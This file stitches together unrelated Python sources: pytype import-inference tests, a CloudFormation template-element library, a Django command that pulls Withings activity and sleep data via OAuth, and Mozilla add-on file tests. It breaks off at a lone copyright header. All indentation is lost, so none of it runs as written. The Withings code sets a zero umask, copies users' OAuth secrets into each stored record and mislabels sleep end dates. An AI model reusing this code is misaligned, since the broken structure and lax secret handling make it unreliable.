d.create_file("path/to/my_module.pytd",
"def qqsv() -> str")
with self.Infer("""\
import path.to.my_module
def foo():
return path.to.my_module.qqsv()
""", deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
self.assertTypesMatchPytd(ty, """
path: module
def foo() -> str
""")
def testPathImport2(self):
with utils.Tempdir() as d:
d.create_file("path/to/my_module.pytd",
"def qqsv() -> str")
with self.Infer("""\
import nonexistant_path.to.my_module
def foo():
return path.to.my_module.qqsv()
""", deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
self.assertTypesMatchPytd(ty, """
nonexistant_path: ?
def foo() -> ?
""")
def testImportAll(self):
self.assert_ok("""\
from module import *
from path.to.module import *
""")
def testAssignMember(self):
self.assert_ok("""\
import sys
sys.path = []
""")
def testReturnModule(self):
with self.Infer("""
import sys
def f():
return sys
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
sys: module
def f() -> module
""")
def testMatchModule(self):
with self.Infer("""
import sys
def f():
if getattr(sys, "foobar"):
return {sys: sys}.keys()[0]
else:
return sys
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
sys: module
def f() -> module
""")
def testSys(self):
with self.Infer("""
import sys
def f():
return sys.path
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
sys: module
def f() -> list<str>
""")
def testFromSysImport(self):
with self.Infer("""
from sys import path
def f():
return path
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
path: list<str>
def f() -> list<str>
""")
def testImportSys2(self):
with self.Infer("""
import sys
import bad_import
def f():
return sys.stderr
def g():
return sys.maxint
def h():
return sys.getrecursionlimit()
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
bad_import: ?
sys: module
def f() -> file
def g() -> int
def h() -> int
""")
def testStdlib(self):
with self.Infer("""
import StringIO
def f():
return StringIO.StringIO().isatty()
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
StringIO: module
def f() -> bool
""")
# TODO(pludemann): Implement import of .py
# This test has never worked, except in the sense that it didn't fail.
# We need to define how import works if there's a .py file; also how it
# works if there are both a .py file and a .pytd file.
@unittest.skip("Broken - def g() -> long list of types")
def testImportPy(self):
with utils.Tempdir() as d:
d.create_file("other_file.py", """
def f():
return 3.14159
""")
d.create_file("main.py", """
from other_file import f
def g():
return f()
""")
ty = self.InferFromFile(
filename=d["main.py"],
# Note that .pytd is the extension for pythonpath and not .py, so
# "import" will fail to find other_file.py
pythonpath=[d.path])
# TODO(kramm): Do more testing here once pludemann@ has implemented logic
# for actually using pythonpath. Also below.
self.assertTypesMatchPytd(ty, """
def g() -> float
""")
def testImportPytd(self):
with utils.Tempdir() as d:
d.create_file("other_file.pytd", """
def f() -> int
""")
d.create_file("main.py", """
from other_file import f
""")
ty = self.InferFromFile(
filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
f: function
""")
def testImportPytd2(self):
with utils.Tempdir() as d:
d.create_file("other_file.pytd", """
def f() -> int
""")
d.create_file("main.py", """
from other_file import f
def g():
return f()
""")
ty = self.InferFromFile(
filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
f: function
def g() -> int
""")
def testImportDirectory(self):
with utils.Tempdir() as d:
d.create_file("sub/other_file.pytd", "def f() -> int")
d.create_file("sub/bar/baz.pytd", "def g() -> float")
d.create_file("main.py", """
from sub import other_file
import sub.bar.baz
from sub.bar.baz import g
def h():
return other_file.f()
def i():
return g()
def j():
return sub.bar.baz.g()
""")
ty = self.InferFromFile(
filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
other_file: module
g: function
sub: module # from 'import sub.bar.baz'
def h() -> int
def i() -> float
def j() -> float
""")
def testImportInit(self):
with utils.Tempdir() as d:
d.create_file("sub/__init__.pytd", """
def f() -> int
""")
d.create_file("main.py", """
from sub import f
def g():
return f()
""")
ty = self.InferFromFile(filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
f: function
def g() -> int
""")
def testImportName(self):
with utils.Tempdir() as d:
d.create_file("foo.pytd", """
class A:
pass
def f() -> A
""")
d.create_file("main.py", """
from foo import f
def g():
return f()
""")
ty = self.InferFromFile(filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
f: function
def g() -> foo.A
""")
def testDeepDependency(self):
with utils.Tempdir() as d:
d.create_file("foo.pytd", "x: bar.Bar")
d.create_file("bar.pytd", """
class Bar:
def bar(self) -> int
""")
d.create_file("main.py", """
from foo import x
def f():
return x.bar()
""")
ty = self.InferFromFile(filename=d["main.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
x: bar.Bar
def f() -> int
""")
def testRelativeImport(self):
with utils.Tempdir() as d:
d.create_file("foo/baz.pytd", """x: int""")
d.create_file("foo/bar.py", """
from . import baz
def f():
return baz.x
""")
ty = self.InferFromFile(filename=d["foo/bar.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
baz: module
def f() -> int
""")
def testDotDot(self):
with utils.Tempdir() as d:
d.create_file("foo/baz.pytd", """x: int""")
d.create_file("foo/deep/bar.py", """
from .. import baz
def f():
return baz.x
""")
ty = self.InferFromFile(filename=d["foo/deep/bar.py"],
pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
baz: module
def f() -> int
""")
def testFileImport1(self):
with utils.Tempdir() as d:
d.create_file("path/to/some/module.pytd",
"def foo(x:int) -> str")
with self.Infer("""\
import path.to.some.module
def my_foo(x):
return path.to.some.module.foo(x)
""", deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
self.assertTypesMatchPytd(ty, """
path: module
def my_foo(x:bool or int) -> str
""")
def testFileImport2(self):
with utils.Tempdir() as d:
d.create_file("path/to/some/module.pytd",
"def foo(x:int) -> str")
with self.Infer("""\
from path.to.some import module
def my_foo(x):
return module.foo(x)
""", deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
self.assertTypesMatchPytd(ty, """
module: module
def my_foo(x:bool or int) -> str
""")
def testSolveForImported(self):
with self.Infer("""\
import StringIO
def my_foo(x):
return x.read()
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
StringIO: module
def my_foo(x:file or StringIO.StringIO) -> str
""")
def testImportBuiltins(self):
with self.Infer("""\
import __builtin__ as builtins
def f():
return builtins.int()
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
builtins: module
def f() -> __builtin__.int
""")
def testImportedMethodAsClassAttribute(self):
with self.Infer("""
import os
class Foo(object):
killpg = os.killpg
""", deep=True, solve_unknowns=True) as ty:
self.assertTypesMatchPytd(ty, """
os: module
class Foo:
killpg: function
""")
def testMatchAgainstImported(self):
with utils.Tempdir() as d:
d.create_file("foo.pytd", """
class Foo:
pass
class Bar:
def f1(self, x: Foo) -> Baz
class Baz:
pass
""")
with self.Infer("""\
import foo
def f(x, y):
return x.f1(y)
def g(x):
return x.f1(foo.Foo())
class FooSub(foo.Foo):
pass
def h(x):
return x.f1(FooSub())
""", deep=True, solve_unknowns=True, pythonpath=[d.path]) as ty:
self.assertTypesMatchPytd(ty, """
foo: module
def f(x:foo.Bar, y:foo.Foo) -> foo.Baz
def g(x:foo.Bar) -> foo.Baz
def h(x:foo.Bar) -> foo.Baz
class FooSub(foo.Foo):
pass
""")
def testImportedConstants(self):
with utils.Tempdir() as d:
d.create_file("module.pytd", """
x: int
class Foo:
x: float
""")
with self.Infer("""\
import module
def f():
return module.x
def g():
return module.Foo().x
def h():
return module.Foo.x
""", deep=True, solve_unknowns=False, pythonpath=[d.path]) as ty:
self.assertTypesMatchPytd(ty, """
module: module
def f() -> int
def g() -> float
def h() -> float
""")
if __name__ == "__main__":
test_inference.main()
| |
'''
Basic definition of the elements available for building CloudFormation stack templates
@author: David Losada Carballo <david@tuxpiper.com>
'''
import copy
class CfnSimpleExpr(object):
"""
A static CloudFormation expression (i.e { "Ref" : "AWS::StackName" })
"""
def __init__(self, definition):
self.definition = definition
def cfn_expand(self):
return self.definition
def __repr__(self):
return "<CfnSimpleExpr: '%s'>" % self.definition
class CfnGetAttrExpr(object):
def __init__(self, el, attr):
self.el = el
self.attr = attr
def cfn_expand(self):
return CfnSimpleExpr({"Fn::GetAtt" : [ self.el.ref_name, self.attr ]})
def __repr__(self):
return "<CfnGetAttrExpr: '%s', '%s'>" % (self.el.ref_name, self.attr)
class GetRefNameExpr(object):
"""
An expression that returns the name of the given element
"""
def __init__(self, element):
self.element = element
def cfn_expand(self):
return self.element.ref_name
def __repr__(self):
return "<GetRefNameExpr: '%s', '%s'>" % self.element.ref_name
class CfnRegionExpr(object):
def cfn_expand(self):
return { "Ref" : "AWS::Region" }
def resolve(self, stack=None, element=None, cfn_env=None):
if cfn_env.has_key("region"):
return cfn_env["region"]
def __repr__(self):
return "<CfnRegionExpr>"
class CfnSelectExpr(object):
def __init__(self, listOfObjects, index):
self.listOfObjects = listOfObjects
self.index = index
def cfn_expand(self):
listOfObjects = self.listOfObjects
index = self.index
#
if hasattr(listOfObjects, "cfn_expand"):
listOfObjects = listOfObjects.cfn_expand()
if hasattr(index, "cfn_expand"):
index = index.cfn_expand()
#
return CfnSimpleExpr({"Fn::Select": [ index, listOfObjects ]})
class MappingLookupExpr(object):
"""
An expression that performs lookup in a mapping
"""
def __init__(self, mapping, key1, key2):
self.mapping = mapping
self.key1 = key1
self.key2 = key2
def cfn_expand(self):
return {"Fn::FindInMap" : [ self.mapping.ref_name, self.key1, self.key2 ]}
def resolve(self, stack=None, element=None, cfn_env=None):
keyval1 = self.key1
keyval2 = self.key2
if hasattr(keyval1, "resolve"):
keyval1 = keyval1.resolve(stack, element, cfn_env)
if hasattr(keyval2, "resolve"):
keyval2 = keyval2.resolve(stack, element, cfn_env)
return self.mapping.el_attrs[keyval1][keyval2]
def __repr__(self):
return "<MappingLookupExpr: '%s', '%s', '%s'>" % (self.mapping.ref_name, self.key1, self.key2)
def get_ref_name(element):
return GetRefNameExpr(element)
class CloudCastHelperExpr(object):
"""
Helper expressions are interpreted and transformed by resources before passing
onto the CloudFormation tempalte
"""
def resolve(self, stack, element):
raise NotImplementedError("This is for subclasses to sort out")
def cfn_expand(self):
return self.resolvedTo
class ThisResourceExpr(CloudCastHelperExpr):
"""
This expression resolves to the resource where it is contained
"""
def resolve(self, stack=None, element=None, cfn_env=None):
self.resolvedTo = element.ref_name
def __repr__(self):
return "<ThisResourceExpr>"
class StackElement(object):
"""
Class for elements that appear in the stack definition, this includes
parameters, resources, outputs and mappings
"""
def __init__(self, **kwargs):
"""
Creates the stack element, copying the provided properties
"""
self.ref_name = None # Reference name in template module
self.ref_count = 0 # Only one reference allowed
self.el_attrs = copy.copy(kwargs)
self.dont_dump = False # Avoids dumping the element when transformning
# Filter out any attributes with value None
self.el_attrs = dict(filter(lambda(k,v): v is not None, self.el_attrs.iteritems()))
def contents(self, stack):
return (self.ref_name, self.el_attrs)
def cfn_expand(self):
"""
Returns AWS CloudFormation idiom for referencing the element
"""
if self.ref_name is None:
raise Exception("Tried to get a reference when I still don't have a name!")
return lambda: CfnSimpleExpr({ "Ref" : self.ref_name })
def __getattribute__(self, name):
"""
Capture some attribute references.
- 'name' returns an object that, when evaluated, will resolve to this resource's name
within the stack template
"""
if name == "name":
return lambda: self.ref_name
else:
return super(StackElement, self).__getattribute__(name)
class Parameter(StackElement):
"""
Stack parameter
"""
def __init__(self, **kwargs):
StackElement.__init__(self, **kwargs)
class Mapping(StackElement):
"""
Stack mapping.
"""
def __init__(self, mapping):
StackElement.__init__(self, **mapping)
self.is_used = False
def find(self, key1, key2):
self.is_used = True
return MappingLookupExpr(self, key1, key2)
class Output(StackElement):
"""
Stack output
"""
pass
class Resource(StackElement):
"""
Stack resource
"""
@classmethod
def ThisName(cls):
"""
Returns a static expression that, when evaluated, will be
resolved to the CloudFormation name of the resource where this
expression is used. This will be just a string for CloudFormation and,
thus, it won't be failing because of recursive element dependencies.
"""
return ThisResourceExpr()
def __init__(self, resource_type, **kwargs):
self.resource_type = resource_type
# If 'Properties' not specified, all kwargs are properties
if not kwargs.has_key("Properties"):
properties = copy.copy(kwargs)
# except Metadata, it is an element attribute of its own
if kwargs.has_key('Metadata'):
properties.pop('Metadata')
metadata = kwargs['Metadata']
else:
metadata = None
# And DependsOn, that is also on its own
if kwargs.has_key('DependsOn'):
properties.pop('DependsOn')
depends_on = kwargs['DependsOn']
else:
depends_on = None
# DeletionPolicy handling
if kwargs.has_key('DeletionPolicy'):
properties.pop('DeletionPolicy')
deletion_policy = kwargs['DeletionPolicy']
else:
deletion_policy = None
# UpdatePolicy handling
if kwargs.has_key('UpdatePolicy'):
properties.pop('UpdatePolicy')
update_policy = kwargs['UpdatePolicy']
else:
update_policy = None
# UpdatePolicy handling
StackElement.__init__(self,
Type=resource_type,
Metadata=metadata,
DependsOn=depends_on,
Properties=properties,
DeletionPolicy = deletion_policy,
UpdatePolicy = update_policy
)
else:
StackElement.__init__(self,
Type=resource_type,
**copy.copy(kwargs))
def add_dependency(self, dep):
if not self.el_props.has_key("DependsOn"):
self.el_attrs["DependsOn"] = [ dep ]
else:
self.el_attrs["DependsOn"].append(dep)
def add_property(self, key, value):
if not self.el_attrs.has_key('Properties'):
self.el_attrs['Properties'] = {}
self.el_attrs['Properties'][key] = value
def get_property(self, key, default=None):
if not self.el_attrs.has_key('Properties') or not self.el_attrs['Properties'].has_key(key):
return default
return self.el_attrs['Properties'][key]
def add_metadata_key(self, key, value):
if not self.el_attrs.has_key('Metadata'):
self.el_attrs['Metadata'] = {}
self.el_attrs['Metadata'][key] = value
def get_metadata_key(self, key, default=None):
if not self.el_attrs.has_key('Metadata') or not self.el_attrs['Metadata'].has_key(key):
return default
return self.el_attrs['Metadata'][key]
def contents(self, stack):
# Find and resolve helper expressions before dumping the contents
from cloudcast._utils import walk_values
for value in walk_values(self.el_attrs):
if isinstance(value, CloudCastHelperExpr): value.resolve(stack, self)
#
# Dump the contents
return (self.ref_name, self.el_attrs)
def __getitem__(self, key):
"""
[] operator for a resource element is equivalent to calling
cloudformation's "Fn::GetAtt"
"""
return CfnGetAttrExpr(self, key)
def __repr__(self):
return "<Resource('%s')>" % self.ref_name
class LaunchableResource(Resource):
def __init__(self, restype, **kwargs):
self.iscm = None
if kwargs.has_key("iscm"):
# If an SCM spec is given, build it
from cloudcast.iscm import ISCM
if isinstance(kwargs["iscm"], ISCM):
self.iscm = kwargs["iscm"]
else:
self.iscm = ISCM(kwargs["iscm"])
kwargs.pop("iscm")
Resource.__init__(self, restype, **kwargs)
def contents(self, stack):
# Before "spilling the beans", let the iscm update this element
if self.iscm is not None:
self.iscm.apply_to(self)
# Proceed with dumping the contents
return Resource.contents(self, stack)
def is_buildable(self):
if self.iscm is None:
return False
return self.iscm.is_buildable()
def resolve_ami(self, **kwargs):
ami = self.el_attrs["Properties"]["ImageId"]
if hasattr(ami, "resolve"):
ami = ami.resolve(stack=None, element=self, cfn_env=kwargs)
return ami
class EC2Instance(LaunchableResource):
def __init__(self, **kwargs):
LaunchableResource.__init__(self, "AWS::EC2::Instance", **kwargs)
@classmethod
def standalone_from_launchable(cls, launch):
"""
Given a launchable resource, create a definition of a standalone
instance, which doesn't depend on or contain references to other
elements.
"""
attrs = copy.copy(launch.el_attrs)
# Remove attributes we overwrite / don't need
del attrs["Type"]
if attrs.has_key("DependsOn"):
del attrs["DependsOn"]
if attrs["Properties"].has_key("SpotPrice"):
del attrs["Properties"]["SpotPrice"]
if attrs["Properties"].has_key("InstanceMonitoring"):
del attrs["Properties"]["InstanceMonitoring"]
if attrs["Properties"].has_key("SecurityGroups"):
del attrs["Properties"]["SecurityGroups"]
if attrs["Properties"].has_key("InstanceId"):
raise RuntimeError("Can't make instance from launchable containing InstanceId property")
inst = EC2Instance(**attrs)
# TODO: shallow copy?
inst.iscm = launch.iscm
return inst
class EC2LaunchConfiguration(LaunchableResource):
def __init__(self, **kwargs):
LaunchableResource.__init__(self, "AWS::AutoScaling::LaunchConfiguration", **kwargs)
class WaitCondition(Resource):
def __init__(self, **kwargs):
Resource.__init__(self, "AWS::CloudFormation::WaitCondition", **kwargs)
class WaitConditionHandle(Resource):
def __init__(self, **kwargs):
Resource.__init__(self, "AWS::CloudFormation::WaitConditionHandle", **kwargs)
| |
# -*- coding: utf-8 -*-
# pylint: disable=no-member, line-too-long
from builtins import str # pylint: disable=redefined-builtin
import datetime
import json
import os
import time
import arrow
from requests_oauthlib import OAuth1Session
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils import timezone
from ...decorators import handle_lock
from ...models import DataPoint, install_supports_jsonfield
GENERATOR_NAME = 'pdk-withings-device: Passive Data Kit Server'
class Command(BaseCommand):
help = 'Compiles data reports requested by end users.'
def add_arguments(self, parser):
parser.add_argument('--start',
type=str,
dest='start',
help='Start of date range to retrieve Withings data in format YYYY-MM-DD')
parser.add_argument('--end',
type=str,
dest='end',
help='End of date range to retrieve Withings data in format YYYY-MM-DD')
@handle_lock
def handle(self, *args, **options): # pylint: disable=too-many-locals,too-many-branches,too-many-statements
os.umask(000)
start = options['start']
if start is None:
start = (timezone.now() - datetime.timedelta(days=1)).strftime('%Y-%m-%d')
end = options['end']
if end is None:
end = timezone.now().strftime('%Y-%m-%d')
start_date = arrow.get(start).replace(hour=0, minute=0, second=0).to(settings.TIME_ZONE)
end_date = arrow.get(end).replace(hour=0, minute=0, second=0).to(settings.TIME_ZONE)
sources = DataPoint.objects.order_by('source').values_list('source', flat=True).distinct()
for source in sources:
data_point = DataPoint.objects.filter(source=source, generator_identifier='pdk-withings-device').order_by('-created').first()
if data_point is not None:
properties = data_point.fetch_properties()
if 'oauth_user_token' in properties and 'oauth_user_secret' in properties and 'oauth_user_id' in properties:
index_date = start_date
while index_date < end_date:
next_day = index_date.replace(days=+1)
# print('FETCHING INTRADAY FOR ' + source + ': ' + str(index_date) + ': ' + str(next_day))
fetch_intraday(source, properties, index_date, next_day)
time.sleep(1)
# print('FETCHING SLEEP MEASURES FOR ' + source + ': ' + str(index_date) + ': ' + str(next_day))
fetch_sleep_measures(source, properties, index_date, next_day)
time.sleep(1)
index_date = next_day
def fetch_intraday(user_id, properties, start_date, end_date): # pylint: disable=too-many-locals, too-many-statements, too-many-branches
api_url = 'https://wbsapi.withings.net/v2/measure?action=getintradayactivity'
api_url += '&userid=' + properties['oauth_user_id']
api_url += '&startdate=' + str(start_date.timestamp)
api_url += '&enddate=' + str(end_date.timestamp)
oauth = OAuth1Session(settings.PDK_WITHINGS_API_KEY, \
client_secret=settings.PDK_WITHINGS_API_SECRET, \
resource_owner_key=properties['oauth_user_token'], \
resource_owner_secret=properties['oauth_user_secret'],
signature_type='query')
response = oauth.get(url=api_url)
results = response.json()
if 'body' in results and 'series' in results['body']:
if results['body']['series'] == []:
return
for timestamp, values in list(results['body']['series'].items()):
found = False
created_date = arrow.get(timestamp).datetime
matches = DataPoint.objects.filter(source=user_id, generator_identifier='pdk-withings-device', created=created_date)
for match in matches:
match_props = match.fetch_properties()
if match_props['datastream'] == 'intraday-activity':
found = True
if found is False:
now = arrow.utcnow()
new_point = DataPoint(source=user_id, generator=GENERATOR_NAME, generator_identifier='pdk-withings-device')
new_point.created = created_date
new_point.recorded = now.datetime
new_properties = {}
new_properties['datastream'] = 'intraday-activity'
new_properties['activity_start'] = int(timestamp)
new_properties['activity_duration'] = values['duration']
if 'calories' in values:
new_properties['calories'] = values['calories']
if 'distance' in values:
new_properties['distance'] = values['distance']
if 'steps' in values:
new_properties['steps'] = values['steps']
if 'elevation' in values:
new_properties['elevation_climbed'] = values['elevation']
if 'sleep_state' in values:
new_properties['sleep_state'] = values['sleep_state']
new_properties['observed'] = now.timestamp * 1000
new_properties['server_fetched'] = True
new_properties['oauth_user_token'] = properties['oauth_user_token']
new_properties['oauth_user_secret'] = properties['oauth_user_secret']
new_properties['oauth_user_id'] = properties['oauth_user_id']
pdk_metadata = {}
pdk_metadata['source'] = user_id
pdk_metadata['generator-id'] = 'pdk-withings-device'
pdk_metadata['generator'] = GENERATOR_NAME
pdk_metadata['timestamp'] = now.timestamp
new_properties['passive-data-metadata'] = pdk_metadata
if install_supports_jsonfield():
new_point.properties = new_properties
else:
new_point.properties = json.dumps(new_properties, indent=2)
new_point.fetch_secondary_identifier()
new_point.save()
def fetch_sleep_measures(user_id, properties, start_date, end_date): # pylint: disable=too-many-locals, too-many-statements, too-many-branches
api_url = 'https://wbsapi.withings.net/v2/sleep?action=get'
api_url += '&userid=' + properties['oauth_user_id']
api_url += '&startdate=' + str(start_date.timestamp)
api_url += '&enddate=' + str(end_date.timestamp)
oauth = OAuth1Session(settings.PDK_WITHINGS_API_KEY, \
client_secret=settings.PDK_WITHINGS_API_SECRET, \
resource_owner_key=properties['oauth_user_token'], \
resource_owner_secret=properties['oauth_user_secret'],
signature_type='query')
response = oauth.get(url=api_url)
results = response.json()
if 'body' in results and 'series' in results['body']:
if results['body']['series'] == []:
return
for item in results['body']['series']:
found = False
created_date = arrow.get(item['enddate']).datetime
matches = DataPoint.objects.filter(source=user_id, generator_identifier='pdk-withings-device', created=created_date)
for match in matches:
match_props = match.fetch_properties()
if match_props['datastream'] == 'sleep-measures' and match_props['start_date'] == item['startdate']:
found = True
if found is False:
now = arrow.utcnow()
new_point = DataPoint(source=user_id, generator=GENERATOR_NAME, generator_identifier='pdk-withings-device')
new_point.created = created_date
new_point.recorded = now.datetime
new_properties = {}
new_properties['datastream'] = 'sleep-measures'
new_properties['start_date'] = item['startdate']
new_properties['end_date'] = item['startdate']
if item['state'] == 0:
new_properties['state'] = 'awake'
elif item['state'] == 1:
new_properties['state'] = 'light-sleep'
elif item['state'] == 2:
new_properties['state'] = 'deep-sleep'
elif item['state'] == 3:
new_properties['state'] = 'rem-sleep'
else:
new_properties['state'] = 'unknown'
if results['body']['model'] == 32:
new_properties['measurement_device'] = 'aura'
elif results['body']['model'] == 16:
new_properties['measurement_device'] = 'activity-tracker'
else:
new_properties['measurement_device'] = 'unknown'
new_properties['observed'] = now.timestamp * 1000
new_properties['server_fetched'] = True
new_properties['oauth_user_token'] = properties['oauth_user_token']
new_properties['oauth_user_secret'] = properties['oauth_user_secret']
new_properties['oauth_user_id'] = properties['oauth_user_id']
pdk_metadata = {}
pdk_metadata['source'] = user_id
pdk_metadata['generator-id'] = 'pdk-withings-device'
pdk_metadata['generator'] = GENERATOR_NAME
pdk_metadata['timestamp'] = now.timestamp
new_properties['passive-data-metadata'] = pdk_metadata
if install_supports_jsonfield():
new_point.properties = new_properties
else:
new_point.properties = json.dumps(new_properties, indent=2)
new_point.fetch_secondary_identifier()
new_point.save()
# else:
# print('SKIPPING ' + str(created_date))
| |
import json
from contextlib import contextmanager
from tempfile import NamedTemporaryFile
import pytest
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from applications.models import AppVersion
from files.models import File
from files.utils import find_jetpacks, is_beta, PackageJSONExtractor
from versions.models import Version
pytestmark = pytest.mark.django_db
def test_is_beta():
assert not is_beta('1.2')
assert is_beta('1.2a')
assert is_beta('1.2a1')
assert is_beta('1.2a123')
assert is_beta('1.2a.1')
assert is_beta('1.2a.123')
assert is_beta('1.2a-1')
assert is_beta('1.2a-123')
assert is_beta('1.2alpha')
assert is_beta('1.2alpha')
assert is_beta('1.2alpha1')
assert is_beta('1.2alpha123')
assert is_beta('1.2alpha.1')
assert is_beta('1.2alpha.123')
assert is_beta('1.2alpha-1')
assert is_beta('1.2alpha-123')
assert is_beta('1.2b')
assert is_beta('1.2b1')
assert is_beta('1.2b123')
assert is_beta('1.2b.1')
assert is_beta('1.2b.123')
assert is_beta('1.2b-1')
assert is_beta('1.2b-123')
assert is_beta('1.2beta')
assert is_beta('1.2beta1')
assert is_beta('1.2beta123')
assert is_beta('1.2beta.1')
assert is_beta('1.2beta.123')
assert is_beta('1.2beta-1')
assert is_beta('1.2beta-123')
assert is_beta('1.2pre')
assert is_beta('1.2pre1')
assert is_beta('1.2pre123')
assert is_beta('1.2pre.1')
assert is_beta('1.2pre.123')
assert is_beta('1.2pre-1')
assert is_beta('1.2pre-123')
assert is_beta('1.2rc')
assert is_beta('1.2rc1')
assert is_beta('1.2rc123')
assert is_beta('1.2rc.1')
assert is_beta('1.2rc.123')
assert is_beta('1.2rc-1')
assert is_beta('1.2rc-123')
class TestFindJetpacks(amo.tests.TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
super(TestFindJetpacks, self).setUp()
File.objects.update(jetpack_version='1.0')
self.file = File.objects.filter(version__addon=3615).get()
def test_success(self):
files = find_jetpacks('1.0', '1.1')
eq_(files, [self.file])
def test_skip_autorepackage(self):
Addon.objects.update(auto_repackage=False)
eq_(find_jetpacks('1.0', '1.1'), [])
def test_minver(self):
files = find_jetpacks('1.1', '1.2')
eq_(files, [self.file])
eq_(files[0].needs_upgrade, False)
def test_maxver(self):
files = find_jetpacks('.1', '1.0')
eq_(files, [self.file])
eq_(files[0].needs_upgrade, False)
def test_unreviewed_files_plus_reviewed_file(self):
# We upgrade unreviewed files up to the latest reviewed file.
v = Version.objects.create(addon_id=3615)
new_file = File.objects.create(version=v, jetpack_version='1.0')
Version.objects.create(addon_id=3615)
new_file2 = File.objects.create(version=v, jetpack_version='1.0')
eq_(new_file.status, amo.STATUS_UNREVIEWED)
eq_(new_file2.status, amo.STATUS_UNREVIEWED)
files = find_jetpacks('1.0', '1.1')
eq_(files, [self.file, new_file, new_file2])
assert all(f.needs_upgrade for f in files)
# Now self.file will not need an upgrade since we skip old versions.
new_file.update(status=amo.STATUS_PUBLIC)
files = find_jetpacks('1.0', '1.1')
eq_(files, [self.file, new_file, new_file2])
eq_(files[0].needs_upgrade, False)
assert all(f.needs_upgrade for f in files[1:])
def test_ignore_non_builder_jetpacks(self):
File.objects.update(builder_version=None)
files = find_jetpacks('.1', '1.0', from_builder_only=True)
eq_(files, [])
def test_find_builder_jetpacks_only(self):
File.objects.update(builder_version='2.0.1')
files = find_jetpacks('.1', '1.0', from_builder_only=True)
eq_(files, [self.file])
class TestPackageJSONExtractor(amo.tests.TestCase):
@contextmanager
def extractor(self, base_data):
with NamedTemporaryFile() as f:
f.write(json.dumps(base_data))
f.flush()
yield PackageJSONExtractor(f.name)
def create_appversion(self, name, version):
return AppVersion.objects.create(application=amo.APPS[name].id,
version=version)
def test_guid(self):
"""Use id for the guid."""
with self.extractor({'id': 'some-id'}) as extractor:
eq_(extractor.parse()['guid'], 'some-id')
def test_name_for_guid_if_no_id(self):
"""Use the name for the guid if there is no id."""
with self.extractor({'name': 'addon-name'}) as extractor:
eq_(extractor.parse()['guid'], 'addon-name')
def test_type(self):
"""Package.json addons are always ADDON_EXTENSION."""
with self.extractor({}) as extractor:
eq_(extractor.parse()['type'], amo.ADDON_EXTENSION)
def test_no_restart(self):
"""Package.json addons are always no-restart."""
with self.extractor({}) as extractor:
eq_(extractor.parse()['no_restart'], True)
def test_name_from_title_with_name(self):
"""Use the title for the name."""
data = {'title': 'The Addon Title', 'name': 'the-addon-name'}
with self.extractor(data) as extractor:
eq_(extractor.parse()['name'], 'The Addon Title')
def test_name_from_name_without_title(self):
"""Use the name for the name if there is no title."""
with self.extractor({'name': 'the-addon-name'}) as extractor:
eq_(extractor.parse()['name'], 'the-addon-name')
def test_version(self):
"""Use version for the version."""
with self.extractor({'version': '23.0.1'}) as extractor:
eq_(extractor.parse()['version'], '23.0.1')
def test_homepage(self):
"""Use homepage for the homepage."""
with self.extractor({'homepage': 'http://my-addon.org'}) as extractor:
eq_(extractor.parse()['homepage'], 'http://my-addon.org')
def test_summary(self):
"""Use description for the summary."""
with self.extractor({'description': 'An addon.'}) as extractor:
eq_(extractor.parse()['summary'], 'An addon.')
def test_apps(self):
"""Use engines for apps."""
firefox_version = self.create_appversion('firefox', '33.0a1')
thunderbird_version = self.create_appversion('thunderbird', '33.0a1')
data = {
'engines': {
'firefox': '>=33.0a1',
'thunderbird': '>=33.0a1',
},
}
with self.extractor(data) as extractor:
apps = extractor.parse()['apps']
apps_dict = dict((app.appdata.short, app) for app in apps)
assert sorted(apps_dict.keys()) == ['firefox', 'thunderbird']
assert apps_dict['firefox'].min == firefox_version
assert apps_dict['firefox'].max == firefox_version
assert apps_dict['thunderbird'].min == thunderbird_version
assert apps_dict['thunderbird'].max == thunderbird_version
def test_unknown_apps_are_ignored(self):
"""Unknown engines get ignored."""
self.create_appversion('firefox', '33.0a1')
self.create_appversion('thunderbird', '33.0a1')
data = {
'engines': {
'firefox': '>=33.0a1',
'thunderbird': '>=33.0a1',
'node': '>=0.10',
},
}
with self.extractor(data) as extractor:
apps = extractor.parse()['apps']
engines = [app.appdata.short for app in apps]
assert sorted(engines) == ['firefox', 'thunderbird'] # Not node.
def test_invalid_app_versions_are_ignored(self):
"""Valid engines with invalid versions are ignored."""
firefox_version = self.create_appversion('firefox', '33.0a1')
data = {
'engines': {
'firefox': '>=33.0a1',
'fennec': '>=33.0a1',
},
}
with self.extractor(data) as extractor:
apps = extractor.parse()['apps']
eq_(len(apps), 1)
eq_(apps[0].appdata.short, 'firefox')
eq_(apps[0].min, firefox_version)
eq_(apps[0].max, firefox_version)
def test_fennec_is_treated_as_android(self):
"""Treat the fennec engine as android."""
android_version = self.create_appversion('android', '33.0a1')
data = {
'engines': {
'fennec': '>=33.0a1',
'node': '>=0.10',
},
}
with self.extractor(data) as extractor:
apps = extractor.parse()['apps']
eq_(apps[0].appdata.short, 'android')
eq_(apps[0].min, android_version)
eq_(apps[0].max, android_version)
| |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
